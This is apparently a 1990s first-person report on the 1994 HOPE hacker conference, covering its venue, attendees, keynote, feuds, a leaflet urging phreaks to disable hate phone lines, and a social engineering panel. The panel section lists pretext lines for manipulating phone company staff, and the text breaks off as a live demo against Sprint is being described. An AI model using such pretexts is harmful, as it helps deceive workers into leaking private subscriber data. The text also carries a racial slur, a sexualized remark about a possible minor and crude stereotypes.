I  used  to commute into Manhattan from  the  Westchester  County 
suburb  of Ossining where I lived 47 feet from the walls of  Sing 
Sing  prison  (no shit!).  Overlooking the wide  expanse  of  the 
Hudson  River from my aerie several hundred feet above, the  only 
disquieting aspect of that location were the enormously deafening 
thunderclaps which resounded a hundred and one times between  the 
cliffs on either side of the river.  Then there was the occasion
al escapee-alarm from the prison. .

So,  it was my daily New York regimen to take the 8:15  into  the 
city. If the train's on time I'll get to work by nine . . .

Grand  Central Station - the grand old landmark thankfully  saved 
by  the late Jackie O. - is the nexus for a few  hundred  million 
commuters  who congregate in New York Shitty for no other  reason 
that to collect a paycheck to afford blood pressure medicine.  

You  have  to understand that New York  is  different.   Imagine, 
picture  in your mind: nothing is so endearing as to watch  thou
sands of briefcase carrying suits scrambling like ants in a  Gary 
Larson cartoon for the nearest taxi, all the while greeting their 
neighbors with the prototypical New York G'day! 

With both fists high in the air, middle fingers locked into erect 
prominence,  a  cacophonous  chorus of   "Good  Fucking  Morning" 
brightens  the  day  of a true New Yorker.   His  bloodshot  eyes 
instantly clear, the blood pressure sinks by 50% and already  the 
first conflict of the day has been waged and won.

Welcome to the Big Apple, and remember never, ever, to say, "Have 
a Nice Day."  Oh, no.  Never.

So  HOPE was bound to be radically different from Vegas's  DefCon 
II,  if  only for the setting.  But, I expected hard  core.   The 
European  contingent  will  be there, as will  Israel  and  South 
America and even the Far East. All told, I am told, 1000 or  more 
are  expected.   And again, as at DefCon II, I am to  speak,  but 
Eric/Emmanuel never told me about what, when, or any of the other 
niceties that go along with this thing we call a schedule.

* * * * *

God, I hate rushing.  

Leaving  Vienna at 3:15 for a 4PM Amtrak "put your life in  their 
hands" three hour trip to New York is not for the faint of heart.  
My rented Hyundai four cylinder limousine wound up like a  sewing 
machine  to 9,600 RPM and hydroplaned the bone dry route 66  into 
the  pot holed, traffic hell of Friday afternoon Washington,  DC.   
Twelve minutes to spare.
 
I made the 23 mile trip is something less than three minutes  and 
bounded  into  the Budget rental return, decelerated  to  impulse 
power  and  let  my brick and lead filled suitcase  drop  to  the 
pavement with a dent and a thud.  "Send me the bill," I  hollered 
at  the attendant.  Never mind that Budget doesn't offer  express 
service like real car rental companies.  "Just send me the bill!" 
and I was off.

Eight minute to spare.  Schlepp, schlepp. Heavy, heavy. 

Holy shit! Look at the line for tickets and I had reservations.  

"Is  this  the  line for the four o'clock to  New  York?"   Pant, 
breathless.

"Yeah."  She never looked up.  

"Will they hold the train?"

"No." A resoundingly rude no at that.  Panic gene takes over.  

"What about the self-ticketing computer?" I said pointing at  the 
self ticketing computer.

"Do you have a reservation?"  

"Yup."  Maybe there is a God.

"Won't help you."

"What?"

Nothing.

"What do you mean won't help?"

"Computer's  broken."  Criminy! I have 4 minutes and here's  this 
over-paid  over-attituded  Amtrak employee who thinks  she's  the 
echo of Whoopi Goldberg.  "The line's over there."

Have you ever begged? I mean really begged?  Well I have.

"Are you waiting for the four?"  "Can I slip ahead?"  "Are you in 
a  death defying hurry?"  "I'll give you a dime for your spot  in 
line."  "You are so pretty for 76, ma'am.  Can I sneak ahead?"  

Tears work.  Two excruciating minutes to go.  I bounced ahead  of 
everyone in a line the length of the Great Wall of China, got  my 
tickets  and  tore ass through Union Station   The  closing  gate 
missed  me but caught the suitcase costing me yet more time as  I 
attempted to disgorge my now-shattered valise from the fork-lift-
like spikes which protect the trains from late-coming  commuters.  
The  rubber edged doors on the train itself were kinder and  gen
tler,  but at this point, screw it.  It was Evian and Fritos  for 
the next three hours. 

* * * * *

Promises  tend to be lies.  The check is in the mail; Dan  Quayle 
will learn to spell; I won't raise taxes.  I wonder about HOPE.

"It's  going to be Bust Central," said one prominent  hacker  who 
threatened  me with electronic assassination if I used his  name.  
"Emmanuel will kill me."   Apparently the authorities-who-be  are 
going to be there in force.  "They want to see if Corrupt or  any 
of  the MoD crew stay after dark, then Zap! Back to jail.   (gig
gle, giggle.)  I want to see that."  

Will Mitnick show up?  I'd like to talk to that boy.  A  thousand 
hackers  in one place and Eric/Emmanuel egging on the Feds to  do 
something  stupid.  Agent Steal will be there, or  registered  at 
least, and half of the folks I know going are using aliases.

"I'd like a room please."

"Yessir. Name?"

"Monkey Meat."

"Is that your first or last name?"

"First."

"Last name?"

"Dilithium Crystal."

"Could you spell that?"

Now:   I  know the Hotel Pennsylvania.  It used to  be  the  high 
class  Statler Hilton until Mr. Hilton himself decided  that  the 
place  was beyond hope.  "Sell it or scuttle it."  They sold  and 
thus  begat the hotel Filthadelphia.  I stayed here once in  1989 
and  it  was a cesspool then.  I wondered  why  the  Farsi-fluent 
bellhop  wouldn't  tell me how bad the damage was from  the  fire 
bombed 12th floor.  The carpets were the same dingy, once upon  a 
time colorful, drab as I remembered.  And, I always have a bit of 
trouble  with a hotel who puts a security check by  the  elevator 
bank.  Gives you the warm and fuzzies that make you want to  come 
back right away.  

I  saved $2 because none of the bell hops noticed I needed  help, 
but then again, it wouldn't have mattered for there was no way he 
and  I and my luggage were going to fit inside of what the  hotel 
euphemistically refers to as a 'room'.  Closet would be kind  but 
still inaccurate.  I think the word, ah, '$95 a night slum' might 
still  be overly generous.  Let's try . . . ah ha! the room  that 
almost survived the fire bombing.  Yeah, that's the ticket.

The  walls were pealing.  Long strips of yellowed  antique  wall
paper  embellished the flatness of the walls as they  curled  to
wards the floor and windows.  The chunks of dried glue  decorated 
the pastel gray with texture and the water stains from I know not 
where  slithered  their way to the soggy carpet in  fractal  pat
terned  rivulets.   I stood in awe at early funk motif  that  the 
Hotel  Filthadelphia  chose in honor of my  attendance  at  HOPE.  
But,  no  matter how bad my room was, at least  it  was  bachelor 
clean.  (Ask your significant other what that means. . .)

In  one hacker's room no bigger than mine I counted  13  sleeping 
bags  lying amongst the growing mold at the intersection  of  the 
drenched  wallboard  and putrefying carpet shreds. (God,  I  love 
going  to hacker conferences!  It's not that I like  Hyatt's  and 
Hilton' all that much: I do prefer the smaller facilities, but, I 
am sad to admit, clean counts at my age.).  My nose did not  have 
to  venture towards the floor to be aware that the Hotel  Filtha
delphia  was  engaging  in top  secret  exobiological  government 
experiments bent on determining their communicability and  infec
tion factor.

The  top  floor of the Hotel Filthadelphia - the 18th -  was  the 
place  for  HOPE, except the elevator door  wouldn't  open.   The 
inner door did, but even with the combined strength of my person
al crowbar (a New York defensive measure only; I never use it  at 
home) and three roughians with a bad case of Mexican Claustropho
bia, we never got the door open.  

The guard in the lobby was a big help. 

"Try again."

Damned  if  he didn't know his elevators and I emerged  into  the 
pre-HOPE chaos of  preparing for a conference.

About  100 hackers lounged around in varying forms of disarray  - 
Hey Rop!

Rop Gongrijjp editor of the Dutch Hacktic is a both a friend  and 
an occasional source of stimulating argument.  Smart as a whip, I 
don't  always agree with him, though, the  above-ground  security 
types  ought  to talk to him for a clear,  concise  and  coherent 
description of the whys and wherefores of hacking.  

Hey Emmanuel!  Hey Strat!  Hey Garbage Heap!  Hey Erikb! Hey   to 
lots of folks.  Is that you Supernigger?  And Julio?  I was  sur
prised.   I knew a lot more of these guys that I thought  I  did. 
Some indicted, some unindicted, some mere sympathizers and  other 
techno-freaks  who  enjoy  a weekend  with  other  techno-freaks. 
Security  dudes  - get hip!  Contact your local hacker  and  make 
friends.  You'll be glad you did.

>From  behind - got me.  My adrenaline went  into  super-saturated 
mode as I was grabbed.  I turned and it was . . . Ben.  Ben is  a 
hugger.  "I just wanted to hug you," he said sweetly but  without 
the  humorous sexually deviant connotation that  occurred  during 
Novocain's  offer  to let Phil Zimmerman sleep with  him  in  Las 
Vegas.

I  smiled a crooked smile.  "Yeah, right."  Woodstock '94  was  a 
mere  120 miles away . . .maybe there was a  psychic  connection.  
But  Ben was being sincere.  He was hugging everyone.   Everyone.  
At  17, he really believes that hugging and hacking are  next  to 
Godliness.   Boy does he have surprise coming the first time  his 
mortgage is late.  Keep hugging while you have the chance, Ben.

Assorted cases of Zima (the disgusting Polish is-this-really-lime 
flavored  beer of choice by those without taste  buds)  appeared, 
but  anyone over the age of 21 drank Bud. What about the 12  year 
olds drinking?  And the 18 year olds?  And the 16 year olds?

"Rop, I don't think you need to give the hotel an excuse to  bust 
you  guys outta here."  Me, fatherly and  responsible?   Stranger 
things have happened.  The beer was gone.  I'm not a  teetotaler, 
but  I didn't want my weekend going up in flames because of  some 
trashed  16 year old puking on an Irani ambassador in the  lobby. 
No reason to test fate. 

* * * * * 

Nothing worked, but that's normal.  

Rop  had  set  up HEU (Hacking at the End of   the  Universe)  in 
Holland last year with a single length of 800m ethernet.  (That's 
meter  for the Americans: about 2625 ft.)  HOPE, though was  dif
ferent.  The Hotel Filthadelphia's switchboard and phone  systems 
crashed  every  half hour or so which doesn't do a  lot  for  the 
health of 28.8 slip lines.  

The  object of the exercise was seemingly simple:  plug  together 
about  20 terminals into a terminal server connected to  Hope.Com 
and  let  'em go at it.  Provide 'net access and,  to  the  lucky 
winner of the crack-the-hopenet server (root) the keys to a  1994 
Corvette!

You  heard  it right! For breaking into root of  their  allegedly 
secure  server, the folks at 2600 are giving away keys to a  1994 
Corvette.  They don't know where the car is, just the keys.   But 
they will give you the car's last known location . . . or was  it 
$50 in cash?

Erikb - Chris Goggans - showed up late Friday night in  disguise: 
a  baseball  cap over his nearly waist length dirty  blond  hair.  
"He's here!" one could hear being muttered.  "He had the balls to 
show  up!"  "He's gonna get his ass kicked to a pulp."   "So  you 
did  come  . . . I was afraid they'd intimidated you to  stay  in 
Texas."

No way! "Why tell the enemy what your plans are."  Even the 50's-
something ex-amphetamine-dealer turned reseller of public-records 
Bootleg  didn't  know  Goggans was going to be  there.   But  the 
multiple fans of Erikb, (a strong resemblance to Cyber Christ  if 
he do say so himself) were a-mighty proud to see him.

This  stunning Asian girl with skin too soft to touch (maybe  she 
was  14, maybe she was 25) looked at Erikb by the message  board.  
"You're," she pointed in disbelief "Erikb?"  Chris nods,  getting 
arrogantly used to the respectful adulation.  Yeah, that's me, to 
which  the  lady/girl/woman instantly replied,  "You're  such  an 
asshole."  Smile, wide smile, hug, kiss, big kiss.  Erikb  revels 
in the attention and hundreds of horny hackers jealously look on.

Friday night was more of an experience - a Baba Ram Dass-like  Be 
Here Now experience - with mellow being the operative word.   The 
hotel  had apparently sacrificed 20,000 square feet of its  pent
house  to hackers, but it was obvious to see they  really  didn't 
give  a  damn  if the whole floor got  trashed.   Ceiling  panels 
dripped from their 12 foot lofts making a scorched Shuttle under
belly look pristine.  What a cesspool!  I swear nothing had  been 
done  to the decorative environs since the day Kennedy was  shot.  
But  kudos to Emmanuel for finding a centrally  located  cesspool 
that undoubtedly gave him one hell of a deal. I think it would be 
a  big mistake to hold a hacker conference at the Plaza  or  some 
such snooty overly-self-indulgent denizen of the rich. 

Filth sort of lends credibility to an event that otherwise  seeks 
notoriety.  

I didn't want to take up too much of Emmanuel's and Rop's time  - 
they were in setup panic - so it was off to the netherworld until 
noon.  That's when a civilized Con begins.

* * * * * 

I  dared to go outside; it was about 11AM and I was in search  of 
the perfect New York breakfast: a greasy spoon that serves coffee 
as  tough  as tree bark and a catatonia inducing  egg  and  bacon 
sandwich.  Munch, munch, munch on that coffee.

I'd forgotten how many beggars hang out on the corner of 33rd and 
7th, all armed with the same words, "how about a handout,  Winn?"  
How the hell do they know my name?  "Whatever you give will  come 
back to you double and triple . . . please man, I gotta eat."  It 
is sad, but John Paul Getty I ain't.  

As  I  munched on my coffee and sipped my  runny  egg-sandwich  I 
noticed that right in front of the runny-egg-sandwich place sat a 
Ford  Econoline van. Nice van.  Nice phone company van. What  are 
they doing here? Oh, yeah, the hackers need lines and the switch
board  is  down.   Of course, the phone company  is  here.   But, 
what's  that? Hello? A Hacker playing in the phone van? I  recog
nize  you! You work with Emmanuel.  How?  He's robbing  it.   Not 
robbing, maybe borrowing.  

The  ersatz telephone van could have fooled anyone - even  me,  a 
color blind quasi-techno-weanie to yell "Yo! Ma Bell!"  But, upon 
not-too-closer inspection, the TPC (The Phone Company) van was in 
fact  a  2600  van  - straight from the  minds  of  Emmanuel  and 
friends.  Impeccable!  The telephone bell in a circle logo is, in 
this  case, connected via cable to a hacker at a  keyboard.   The 
commercial plates add an additional air of respectability to  the 
whole image.  It works.

* * * * *

Up to HOPE - egg sandwich and all.

The  keynote  speech was to be provided courtesy of  the  Man  in 
Blue.   Scheduled  for noon, things were getting off  to  a  late 
start.   The media (who were there in droves, eat your heart  out 
CSI)  converged  on  the MIB to see who and why  someone  of  his 
stature  would  (gasp!) appear/speak at  a  funky-downtown  hotel 
filled  with  the  scourges of Cyberspace. I didn't  see  if  Ben 
hugged the MIB, but I would understand if he didn't.  Few  people 
knew  him or suspected what size of Jim-Carey-MASK arsenal  might 
suddenly appear if a passive hug were accidentally interpreted as 
being too aggressive. The MIB is imposing and Ben too shy.

The  media can ask some dumb questions and write some dumb  arti
cles  because they spend 12 1/2 minutes trying to  understand  an 
entire culture.  Can't do that fellows!  

The  MIB, though, knows hackers and is learning about  them  more 
and  more; and since he is respectable, the media asks him  about 
hackers.  What are hackers?  Why are YOU here, Mr. MIB?

"Because they have a lot to offer.  They are the future," the Man 
In Blue said over and over.  Interview after interview - how time 
flies  when  you're having fun - and the lights and  cameras  are 
rolling from NBC and PIX and CNN and assorted other channels  and 
magazines.   At  12:55 chaos had not settled down  to  regimented 
disorganization and the MIB was getting antsy.  After all, he was 
a military man and 55 minutes off schedule: Egad! Take charge.  

The MIB stood on a chair and hollered to the 700+ hacker  phreaks 
in the demonstration ballroom, "Hey! It's starting.  Let's go the 
theater and get rocking! Follow me."  He leaned over to me:   "Do 
you know where the room is?" 

"Sure, follow me."

"Everyone  follow,  c'mon," yelled the MIB.  "I'm  going  to  get 
started  in exactly three minutes," and three minutes  he  meant.  
Despite the fact that I got lost in a hallway and had hundreds of 
followers  following  my missteps and the MIB yelling at  me  for 
getting lost in a room with only two doors, we did make the  main 
hall,  and  within 90 seconds he took over the podium  and  began 
speaking.  

"I bet you've always wanted to ask a spy a few questions.  Here's 
your chance.  But let me say that the United States  intelligence 
community needs help and you guys are part of the solution."  The 
MIB was impeccably dressed  in his pin stripe with only traces of 
a  Hackers  80 T-shirt leaking through his starched  white  dress 
shirt.   The MIB is no less than Robert Steele, ex-CIA type  spy, 
senior  civilian in Marine Corps Intelligence and now the  Presi
dent of Open Source Solutions, Inc.  

He  got these guys (and gals) going.  Robert doesn't mince  words 
and that's why as he puts it, he's "been adopted by the hackers."  
At his OSS conferences he has successfully juxtaposed hackers and 
senior  KGB officials who needed full time security during  their 
specially  arranged 48 hour visa to Washington, DC.   He  brought 
Emmanuel  and  Rop and clan to his show and since  their  agendas 
aren't all that different, a camaraderie was formed.

Robert MIB Steele believes that the current intelligence  machin
ery is inadequate to meet the challenges of today's world.   Over 
80%  of the classified information contained with  the  Byzantine 
bowels of the government is actually available from open sources.  
We  need to realize that the future is more of an open book  than 
ever before.

We classify newspaper articles from Peru in the incredibly  naive 
belief  that  only Pentagon spooks subscribe.   We  classify  BBC 
video  tapes from the UK with the inane belief that no  one  will 
watch  it  if  it so stamped.  We classify  $4  Billion  National 
Reconnaissance  Office satellite generated street maps of  Calle, 
Colombia  when anyone with an IQ only slightly above a  rock  can 
get  the  same  one from the tourist office.   And  that's  where 
hackers come in.

"You guys are a national resource.  Too bad everyone's so  scared 
of you."  Applause from everywhere.  The MIB knows how to massage 
a crowd.  Hackers, according to Steele, and to a certain extent I 
agree,  are  the  truth tellers "in a  constellation  of  complex 
systems run amok and on the verge of catastrophic collapse."  

Hackers  are the greatest sources of open source  information  in 
the world.  They have the navigation skills, they have the  time, 
and  they have the motivation, Robert says.  Hackers  peruse  the 
edges  of technology and there is little that will stop  them  in 
their efforts.  The intelligence community should take  advantage 
of the skills and lessons that the hackers have to teach us,  yet 
as we all know, political and social oppositions keep both  sides 
(who are really more similar then dissimilar) from talking.  

"Hackers  put  a mirror up to the technical  designers  who  have 
built the networks, and what they see, they don't like.   Hackers 
have  shown  us all the chinks in the armor of  a  house  without 
doors or windows.  The information infrastructure is fragile  and 
we had better do something about it now; before it's too late."  

Beat them at their own game, suggests Steele.  Keep the doors  of 
Cyberspace  open, and sooner or later, the denizens of the  black 
holes of information will have to sooner or late realize that the 
cat is out of the bag.

Steele educated the Hacker crowd in a way new to them:  he treat
ed  them with respect, and in turn he opened a channel of  dialog 
that  few above ground suit-types have ever  envisioned.   Steele 
works at the source.

HOPE had begun and Robert had set the tone.

* * * * * 

The  day was long.  Dogged by press, hackers rolled over  so  the 
reporters  could tickle their stomachs on camera.  Despite  their 
public allegations that the media screws it up and never can  get 
the  story right, a camera is like a magnet.  The New York  Times 
printed  an article about HOPE so off the wall I wondered if  the 
reporter  had actually been there.  Nonetheless, the crowds  fol
lowed  the  cameras,  the cameras followed the  crowds,  and  the 
crowds  parted like the Red Sea.  But these were mighty  colorful 
crowds.

We  all hear of that prototypical image of the acne faced,  Jolt-
drinking,  pepperoni  downing nerdish teenager  who  has  himself 
locked  in  the  un-air-conditioned attic of  his  parents'  half 
million  dollar house from the time school gets out till the  sun 
rises. Wrongo security-breath.  Yeah, there's that component, but 
I was reminded of the '80's, the early '80's by a large  percent
age of the crowd.

Purple  hair  was present but scarce, and I swear on a  stack  of 
2600's that Pat from Saturday Night Live was there putting every
one's hormonal guess-machines to the test.  But what cannot  help 
but  capture one's attention is a 40 pin integrated  circuit  in
serted  into  the  shaved side skull of  an  otherwise  clean-cut 
Mohawk haircut.  

The story goes that Chip Head went to a doctor and had a pair  of 
small  incisions placed in his skull which would hold  the  leads 
from  the chip.  A little dab of glue and in a few days the  skin 
would  grow  back to hold the 40 pins in the natural  way;  God's 
way.

There  was a time that I thought ponytails were 'out' and  passe, 
but  I thought wrong.  Mine got chopped off in roughly 1976  down 
to shoulder length which remained for another six years, but half 
of the HOPE audience is the reason for wide spread poverty in the 
hair salon industry.

Nothing  wrong with long, styled, inventive, outrageous  hair  as 
long  as it's clean; and with barely an exception, such  was  the 
case.   In New York it's not too hard to be perceived  as  clean, 
especially  when you consider the frame of reference. Nothing  is 
too weird.

The energy level of HOPE was much higher than the almost  lethar
gic (but good!) DefCon II.  People move in a great hurry, perhaps 
to  convey  the  sense of importance to others, or  just  out  of 
frenetic  hyperactivity.  Hackers hunched over their keyboards  - 
yet with a sense of urgency and purpose. Quiet yet highly animat
ed  conversations  in all corners.  HOPE staff  endlessly  pacing 
throughout  the  event with their walkie-talkies glued  to  their 
ears.  

Not many suit types.  A handful at best, and what about the Feds?  
I  was accosted a few times for being a Fed, but word spread:  no 
Fed,  no bust.  Where were the Feds?  In the lobby.  The  typical 
NYPD  cop  has  the distinctive reputation  of  being  overweight 
especially when he wearing two holsters - one for the gun and one 
for  the Italian sausage. Perpetually portrayed as donut  dunking 
dodo's,  some New York cops' asses are referred to as the  Fourth 
Precinct and a few actually moonlight as sofas.

So  rather than make a stink, (NY cops hate to make a scene)  the 
lobby  of the Hotel Filthadelphia was home to the  Coffee  Clutch 
for  Cops.   About  a  half dozen of  them  made  their  profound 
presence known by merely spending their day consuming mass  quan
tities  of  questionable  ingestibles, but  that  was  infinitely 
preferable to hanging out on the 18th floor.  The hackers weren't 
causing any trouble, the cops knew that, so why push it.  Hackers 
don't fight, they hack.  Right?

After hours of running hours behind schedule, the HOPE conference 
was  in  first  place for disorganized, with DefCon  II  not  far 
behind.   Only  with 1000 people to keep happy and in  the  right 
rooms,  chaos  reigns sooner.  The free Unix sessions  and  Pager 
session  and open microphone bitch session and the  unadulterated 
true history of 2600 kept audiences of several hundred  hankering 
for more - hour after hour.  

Over by the cellular hacking demonstrations, I ran into a  hacker 
I  had written about: Julio, from the almost defunct  Masters  of 
Destruction.  Julio had gone state's evidence and was prepared to 
testify against MoD ring leader Mark Abene (aka Phiber Optik) but 
once Mark pled guilty to enough crimes to satisfy the Feds, Julio 
was  off  the hook with mere probation.  Good guy, sworn  off  of 
hacking.  Cell phones are so much more interesting.

However,  while standing around with Erikb and a gaggle of  Cyber 
Christ wanna-bes, Julio and his friend (who was the size of Texas 
on  two legs) began a pushing match with Goggans.   "You  fucking 
narc  red-neck  son of a bitch."  Goggans helped build  the  case 
against the MoD and didn't make a lot of friends in the process.

The  shoving  and shouldering reminded me of  slam  dancing  from 
decades past, but these kids are too young to have taken part  in 
the social niceties of deranged high speed propulsion and  revul
sion on the dance floor.  So it was a straight out pushing match, 
which found Erikb doing his bloody best to avoid.  Julio and  pal 
kept a'coming and Erikb kept avoiding.  It took a dozen of us  to 
get  in the middle and see that Julio was escorted to the  eleva
tors.

Julio  said Corrupt, also of the MoD,  was coming down  to  HOPE, 
too.  Corrupt has been accused of mugging drug dealers to finance 
his computer escapades, and was busted along with the rest of the 
MoD  gang.   The  implied threat was taken  seriously,  but,  for 
whatever  reason,  Corrupt  never showed.  It is  said  that  the 
majority of the hacking community distances itself from him; he's 
not  good  for  the collective reputation.  So  much  for  hacker 
fights.  All is calm.

The evening sessions continued and continued with estimates of as 
late  as 4AM being bandied about. Somewhere around 1:00AM  I  ran 
into  Bootleg  in the downstairs bar. Where was  everybody?   Not 
upstairs.   Not in the bar.  I saw a Garbage Heap in  the  street 
outside (now that's a double entendre) and then Goggans popped up 
from  the door of  the Blarney Stone, a syndicated chain of  low-
class Irish bars that serve fabulously thick hot sandwiches.  

"We're about to get thrown out."

"From  the  Blarney Stone?  That's impossible.  Drunks  call  the 
phone booths home!"

Fifty or so hacker/phreaks had migrated to the least likely, most 
anachronistic  location one could imagine.  A handful of  drunken 
sots leaning over their beers on a stain encrusted wooden  breed
ing  ground  for salmonella.  A men's room that hasn't  seen  the 
fuzzy end of a brush for the best part of a century made  Turkish 
toilets appear refreshingly clean.  And they serve food here.

I didn't look like a hacker so I asked the bartender, "Big crowd, 
eh?"

The  barrel  chested beer bellied  barman  nonchalantly  replied, 
"nah.  Pretty usual."  He cleaned a glass so thoroughly the water 
marks stood out plainly.

"Really?   This  much action on a Saturday night on a  dark  side 
street so questionably safe that Manhattan's Mugger Society posts 
warnings?"

"Yup."

"So," I continued.  "These hackers come here a lot?"

"Sure do," he said emphatically.

"Wow.  I didn't know that.  So this is sort of a hacker bar,  you 
might say?"

"Exactly.   Every Saturday night they come in and raise a  little 
hell."

With  a  straight face I somehow managed to  thank  the  confused 
barman  for  his help and for the next four  hours  learned  that 
socially, hackers of today are no different than many if not most 
of  us were in our late teens ad early twenties.  We laughed  and 
joked  and  so  do they - but there is more  computer  talk.   We 
decried the political status of our day as they do theirs, albeit 
they   with less fervor and more resignation.   The  X-Generation 
factor:  most  of them give little more than a  tiny  shit  about 
things  they view as being totally outside their control, so  why 
bother.  Live for today.  

Know they enemy.  Robert hung in with me intermingling and  argu
ing  and  debating  and learning from them,  and  they  from  us.  
Hackers aren't the enemy - their knowledge is - and they are  not 
the  exclusive holders of that information.  Information  Warfare 
is about capabilities, and no matter who possesses that capabili
ty, there ought to be a corresponding amount respect. 

Indeed,  rather than adversaries, hackers could well become  gov
ernment allies and national security assets in an intense  inter
national  cyber-conflict.   In the LoD/MoD War  of  1990-91,  one 
group of hackers did help authorities. Today many hackers  assist 
professional organizations, governments in the US and overseas  - 
although  very  quietly.   'Can't be  seen  consorting  with  the 
enemy.'    Is hacking from an Army or Navy or NATO base  illegal?  
Damned  if I know, but more than one Cyber Christ-like  character 
makes  a  tidy sum providing hands-on hacking  education  to  the 
brass in Europe.  

Where  these guys went after 5AM I don't know, but I was  one  of 
the first to be back at the HOPE conference later that day; 12:30 
PM Sunday.

* * * * * 

The Nazi Hunters were out in force.

"The Neo-Nazi skinheads are trying to start another Holocaust." A 
piercing, almost annoying voice stabbed right through the crowds.  
"Their racist propaganda advocates killing Jews and blacks.  They 
have to be stopped, now."

Mortechai Levy (I'll call him Morty) commanded the attention of a 
couple  dozen  hackers.  Morty was a  good,  emotional,  riveting 
shouter.  "These cowardly bastards have set up vicious hate  call 
lines  in  over 50 cities.  The messages advocate  burning  syna
gogues, killing minorities and other violence.  These phones have 
to be stopped!"

The ever-present leaflet from Morty's Jewish Defense Organization 
asked for help from the 2600 population.  

     "Phone  freaks  you must use your various  assorted  bag  of 
     tricks  to  shut these lines down. No  cowardly  sputterings 
     about 'free speech' for these fascist scum."  

The headline invited the hacker/phreak community to:

               "Let's Shut Down 'Dial-A-Nazi'!!!"

Morty was looking for political and technical support from a band 
of  nowhere  men and women who largely don't know  where  they're 
going  much  less care about an organized political  response  to 
someone  elses cause.  He wasn't making a lot of headway, and  he 
must  have  know that he would walk right  into  the  anarchist's 
bible: the 1st amendment.

The  battle  lines had been set.  Morty wanted to see  the  Nazis 
censored  and  hackers are absolute freedom of speechers  by  any 
measure.  Even Ben sauntering over for a group hug did little  to 
defuse the mounting tension.

I  couldn't help but play mediator. Morty was belligerently  loud 
and being deafeningly intrusive which affected the on-going  ses
sions.  To tone it down some, we nudged Morty and company off  to 
the  side  and occupied a corner of thread bare  carpet,  leaning 
against a boorish beige wall that had lost its better epidermis.  

The  heated  freedom  of speech versus the  promotion  of  racial 
genocide rancor subdued little even though we were all buns  side 
down.  I tried to get a little control of the situation.

"Morty. Answer me this so we know where you're coming from.   You 
advocate the silencing of the Nazis, right?

"They're planning a new race war; they have to be stopped."

"So  you  want  them silenced.  You say their  phones  should  be 
stopped and that the hackers should help."

"Call  that  number  and they'll tell you that  Jews  and  blacks 
should be killed and then they . . ."

"Morty.  OK, you want to censor the Nazis.  Yes or No."

"Yes."

"OK,  I can understand that.  The question really is, and I  need 
your help here, what is the line of censorship that you advocate.  
Where is your line of legal versus censored?"

A  few more minutes of political diatribe and then he got to  the 
point.  "Any group with a history of violence should be  censored 
and stopped."  A little imagination and suddenly the whole planet 
is silenced.  We need a better line, please.  "Hate group, Nazis, 
people   who   advocate   genocide  .  .   .   they   should   be 
silenced . . . ."

"So,"  I  analyzed.  "You want to establish  censorship  criteria 
based  upon  subjective interpretation.   Whose  interpretation?"  
My approach brought nods of approval.

One  has to admire Morty and his sheer audacity and tenacity  and 
how  much  he strenuously and single-mindedly drives  his  points 
home.   He  didn't have the ideal sympathetic  audience,  but  he 
wouldn't give an inch.  Not an inch.  A little self righteousness 
goes  a long way; boisterous extremism grows stale.   It  invites 
punitive  retorts  and  teasing, or  in  counter-culture  jargon, 
"fucking with their heads."

Morty  (perhaps for justifiable reasons) was  totally  inflexible 
and  thus  more prone to verbal barbing.  "You're just  a  Jewish 
racist.   Racism in reverse," accused one jocular but  definitely 
lower  middle  class hacker with an accent thicker  than  all  of 
Brooklyn.    

Incoming  Scuds!   Look  out! Morty went nuts and  as  they  say, 
freedom  of  speech ends when my fists impacts  upon  your  nose.  
Morty  came  dangerously  close to crossing  that  line.   Whoah, 
Morty,  whoah.  He's just fucking with your head.  The  calm-down 
brigade did its level best to keep these two mortals at  opposite 
ends of the room. 

"You  support  that  Neo Nazi down there; you're as  bad  as  the 
rest!"  Morty  said. "See what I have to tolerate.  I  know  him, 
we've been keeping track of him and he hangs out with the son  of 
the  Grand  Wizard of Nazi Oz."  The paranoid train  got  on  the 
tracks.  

"Do you really know the Big Poo-bah of Hate?" I asked the  hacker 
under assault and now under protective custody.

"Yeah," he said candidly.  "He's some dick head who hates  every
one.  Real jerk."

"So what about you said to Morty over there?"

"Just  fucking with his head.  He gets a little extreme."  So  we 
had  in our midst the Al Sharpton of the Jewish  faith.   Ballsy. 
Since Morty takes Saturday's off by religious law, he missed  the 
press  cavalcade,  but as a radical New York fixture,  the  media 
probably didn't mind too much.

I was off to sessions, Morty found new audiences as they came off 
the elevators, and the band played on.

* * * * *

In  my humble 40-something opinion, the best session of HOPE  was 
the  one  on social engineering.  

The  panel consisted of only Emmanuel, Supernigger (social  engi
neer par excellence) and Cheshire Catalyst.  The first bits  were 
pretty  staid dry conventional conference (ConCon) oriented,  but 
nonetheless, not the kind of info that you expect to find William 
H. Murray, Executive Consultant handing out.  

The  best social engineers make friends of their victims.  Remem
ber: you're playing a role.  Think Remington Steele.

Schmooze!  "Hey,  Jack did you get a load of the blond  on  Stern 
last night?"

Justifiable anger: "Your department has caused nothing but  head
aches.   These  damn new computers/phones/technology  just  don't 
work like the old ones.  Now either you help me now or I'm  going 
all the way to Shellhorn and we'll what he says about these kinds 
of screwups."  A contrite response is the desired effect. 

Butt  headed bosses: "Hey, my boss is all over my butt,  can  you 
help me out?"

Management  hatred:  "I'm sitting here at 3PM working while  man
agement is on their yachts.  Can you tell me . . .?"

Giveaways: "Did you know that so and so is having an affair  with 
so and so?  It's true, I swear.  By the way, can you tell me  how 
to . . ."

Empathy:  "I'm new, haven't been to the training course and  they 
expect me to figure this out all by myself.  It's not fair."

Thick Accent: "Hi.  Dees computes haf big no wurk. Eet no makedah 
passurt. Cunu help?  Ah, tanku." Good for a quick exchange and  a 
quick  good-bye.  Carefully done, people want you off  the  phone 
quickly.

Billsf,  the  almost 40 American phreak who now  calls  Amsterdam 
home  was  wiring  up Supernigger's real  live  demonstration  of 
social  engineering against Sprint. A dial tone came over the  PA 
system followed by the pulses to 411.

"Directory  Assistance," the operator's male voice  was  squeezed 
into a mere three kilohertz bandwidth.

Suddenly, to the immense pleasure of the audience, an  ear-split
ting screech a thousand times louder than finger nails on a chalk 
board not only belched across the sound system but caused instant 
bleeding  in  the ears of the innocent but now deaf  operator.  .  
Billsf   sheepishly  grinned.   "Just trying to wire  up  a  mute 
button."  

Three hundred people in unison responded: "It doesn't work."   No 
shit.

While  Billsf feverishly worked to regain his reputation,  Super
nigger  explained  what he was going to do. The  phone  companies 
have a service, ostensibly for internal use, called a C/NA.  Sort 
of a reverse directory when you have the number but want to  know 
who  the  number  belongs to and from whence it  comes.  You  can 
understand  that this is not the sort of feature that  the  phone 
company  wants to have in the hands of a generation of  kids  who 
are  so  apathetic that they don't even know they  don't  give  a 
shit.   Nonetheless, the access to this capability is through  an 
